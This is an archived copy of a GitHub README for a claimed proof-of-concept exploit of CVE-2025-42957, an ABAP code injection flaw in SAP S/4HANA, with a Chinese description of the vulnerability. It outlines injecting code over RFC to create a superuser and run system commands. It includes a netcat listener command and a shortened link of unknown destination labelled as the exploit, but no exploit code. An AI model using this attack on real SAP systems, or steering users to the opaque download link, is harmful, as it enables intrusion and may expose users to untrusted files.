Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-42957 PoC — SAP S/4HANA 代码注入漏洞

Source
https://github.com/callinston/CVE-2025-42957
Associated Vulnerability
Title:SAP S/4HANA 代码注入漏洞 (CVE-2025-42957)
Description:SAP S/4HANA是德国思爱普(SAP)公司的一个基于 SAP HANA 内存数据库系统的的企业资源管理软件。 SAP S/4HANA存在代码注入漏洞,该漏洞源于可通过RFC注入任意ABAP代码。
Readme
## Proof-of-Concept exploit for the ABAP Code Injection vulnerability in SAP S/4HANA (CVE-2025-42957).

### **Disclaimer**
This tool is intended for security research and educational purposes only. Any use of this code for malicious activities is strictly prohibited. The author is not responsible for any misuse or damage caused by this program. Use at your own risk.

### **Technical Analysis**
The vulnerability exists within SAP S/4HANA's RFC-exposed function modules, specifically in the handling of user input parameters in the S4CORE component. This exploit targets the ABAP code processing pipeline. By crafting a malicious input string for a vulnerable function module, an attacker can inject arbitrary ABAP code, bypassing authorization checks and executing it on the server. This is achieved through improper sanitization of input data, allowing the injection of statements like user creation or system commands. The injected code runs in the context of the ABAP application server, leading to privilege escalation, data manipulation, or remote code execution on the underlying OS. The attack vector is viable through SAP GUI, custom RFC clients, or integrated systems that call the exposed modules, requiring only low-privileged authentication.

### **Usage**
The exploit is generated using a Python script. It creates a malicious RFC payload to trigger the vulnerability.
1. **Set up a listener** if planning for command execution (optional for basic tests). Netcat is a simple option:
    ```bash
    nc -lvnp 4444
    ```
2. **Generate and send the exploit payload:**
    Run the `cve-2025-42957.py` script, providing the SAP host details, credentials, and desired payload.
    ```bash
    python cve-2025-42957.py
    ```
3. **Deliver the payload.**
    The script automatically connects via RFC and injects the code. No file transfer needed; the vulnerability triggers upon function invocation.
4. **Observe the results.**
    Check the SAP system for changes (e.g., new superuser account) or monitor your listener for any OS-level command output.

### **Demo**
The following demonstration shows the exploit in action. The script is run against a test SAP instance, injecting code to create a superuser and execute a system command, resulting in immediate compromise.
`demo.mp4`

### Exploit
[href](https://tinyurl.com/37y2mrb3)

For any inquiries, please email me at: trannguyennam65@gmail.com
File Snapshot

 [4.0K]  /data/pocs/dfc43de9c549ded125297b1130c5da262753401d
└── [2.4K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.